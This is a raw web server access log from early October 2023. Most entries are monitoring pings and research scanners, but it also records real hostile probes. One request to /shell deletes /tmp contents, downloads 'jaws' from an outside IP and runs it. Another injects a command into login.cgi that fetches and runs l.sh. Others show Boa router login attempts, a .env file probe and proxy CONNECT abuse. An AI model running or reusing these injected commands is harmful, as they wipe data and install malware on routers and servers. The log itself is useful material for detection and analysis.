212.91.246.72 - - [04/Oct/2023:22:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:58:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:59:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:59:59 +0200] "GET /NPClient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.177.147.70 - - [04/Oct/2023:23:00:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:00:32 +0200] "GET /login/?next=/ HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:00:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:23:01:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:01:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:02:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.169.184.14 - - [04/Oct/2023:23:02:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:02:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:03:06 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:03:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:04:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:05:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:05:39 +0200] "GET /global-protect/login.esp HTTP/1.1" 404 329 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:07:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:08:12 +0200] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:08:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:09:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:10:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:10:45 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:11:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:12:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:12:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:13:14 +0200] "GET /login.rsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:14:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:15:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:15:42 +0200] "GET /Login.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:15:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:16:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:17:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:17:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:18:11 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:18:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:19:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:20:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:20:39 +0200] "GET /npclient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:20:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.155.86 - - [04/Oct/2023:23:20:47 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:23:21:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:22:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:22:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.54.51.12 - - [04/Oct/2023:23:23:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
35.177.147.70 - - [04/Oct/2023:23:23:07 +0200] "GET /NPClient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:23:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.214.150.77 - - [04/Oct/2023:23:24:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Oct/2023:23:24:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:25:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:25:35 +0200] "GET /apps HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:25:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:26:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:27:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:27:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:28:02 +0200] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:29:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:30:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:30:44 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
84.54.51.12 - - [04/Oct/2023:23:30:46 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:23:31:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:32:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:33:13 +0200] "GET /video.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.8.184 - - [04/Oct/2023:23:33:58 +0200] "CONNECT proxy.korsangazi.com:443 HTTP/1.1" 405 350 "-" "-"
185.196.8.184 - - [04/Oct/2023:23:34:06 +0200] "GET http://proxy.korsangazi.com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1" 404 349 "-" "node-fetch/1.0 (+https://github.com/bitinn/node-fetch)"
212.91.246.72 - - [04/Oct/2023:23:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:35:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:35:39 +0200] "GET /2.0/gui/ HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:37:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:38:07 +0200] "GET /mm/ HTTP/1.1" 404 308 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:38:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:40:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:40:35 +0200] "GET /ui HTTP/1.1" 404 307 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:42:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:43:03 +0200] "GET /portal HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:45:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:45:31 +0200] "GET /node HTTP/1.1" 404 309 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:47:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:47:58 +0200] "GET /login.cs HTTP/1.1" 404 313 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.155.76 - - [04/Oct/2023:23:49:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:23:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:50:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:50:26 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.155.61 - - [04/Oct/2023:23:50:51 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:23:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:52:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:52:45 +0200] "GET /WebViewer.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.180.143.50 - - [04/Oct/2023:23:53:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
15.160.173.143 - - [04/Oct/2023:23:53:27 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:23:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:54:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:55:14 +0200] "GET /vpn/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:23:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:56:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [04/Oct/2023:23:57:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [04/Oct/2023:23:57:39 +0200] "GET /web/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
165.232.155.86 - - [04/Oct/2023:23:57:40 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:23:57:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:23:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.248.32 - - [04/Oct/2023:23:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.177.147.70 - - [04/Oct/2023:23:59:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:23:59:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.177.147.70 - - [05/Oct/2023:00:00:08 +0200] "GET /webui HTTP/1.1" 404 310 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.177.147.70 - - [05/Oct/2023:00:02:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [05/Oct/2023:00:02:36 +0200] "GET /NPClient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.177.147.70 - - [05/Oct/2023:00:04:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.177.147.70 - - [05/Oct/2023:00:05:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
128.14.209.26 - - [05/Oct/2023:00:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
95.214.55.244 - - [05/Oct/2023:00:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.244 - - [05/Oct/2023:00:10:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.244 - - [05/Oct/2023:00:15:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.170.144.3 - - [05/Oct/2023:00:23:49 +0200] "\x03" 501 316 "-" "-"
165.154.162.96 - - [05/Oct/2023:00:26:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.232.155.22 - - [05/Oct/2023:00:28:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.76.96.55 - - [05/Oct/2023:00:37:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
77.78.201.59 - - [05/Oct/2023:00:39:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
35.203.210.238 - - [05/Oct/2023:00:45:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
165.232.155.113 - - [05/Oct/2023:00:47:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.94.138.52 - - [05/Oct/2023:00:47:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.52 - - [05/Oct/2023:00:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [05/Oct/2023:00:47:42 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.52 - - [05/Oct/2023:00:47:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.35.18.187 - - [05/Oct/2023:00:49:10 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
180.149.125.168 - - [05/Oct/2023:00:54:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
34.67.136.168 - - [05/Oct/2023:00:55:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
165.232.155.201 - - [05/Oct/2023:01:04:59 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.155.22 - - [05/Oct/2023:01:05:41 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.155.201 - - [05/Oct/2023:01:12:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.35.18.187 - - [05/Oct/2023:01:15:03 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
180.149.125.169 - - [05/Oct/2023:01:15:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
187.76.204.234 - - [05/Oct/2023:01:17:50 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
193.35.18.187 - - [05/Oct/2023:01:22:10 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
165.232.155.22 - - [05/Oct/2023:01:26:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
34.140.248.32 - - [05/Oct/2023:01:33:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
181.214.147.242 - - [05/Oct/2023:01:33:28 +0200] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
165.232.155.22 - - [05/Oct/2023:01:34:21 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
198.235.24.149 - - [05/Oct/2023:01:35:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
165.232.155.201 - - [05/Oct/2023:01:38:56 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.155.61 - - [05/Oct/2023:01:42:42 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.155.86 - - [05/Oct/2023:01:49:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
180.2.99.3 - - [05/Oct/2023:01:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
54.163.117.206 - - [05/Oct/2023:01:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3105.69 Safari/537.32"
167.248.133.49 - - [05/Oct/2023:02:02:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.49 - - [05/Oct/2023:02:02:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
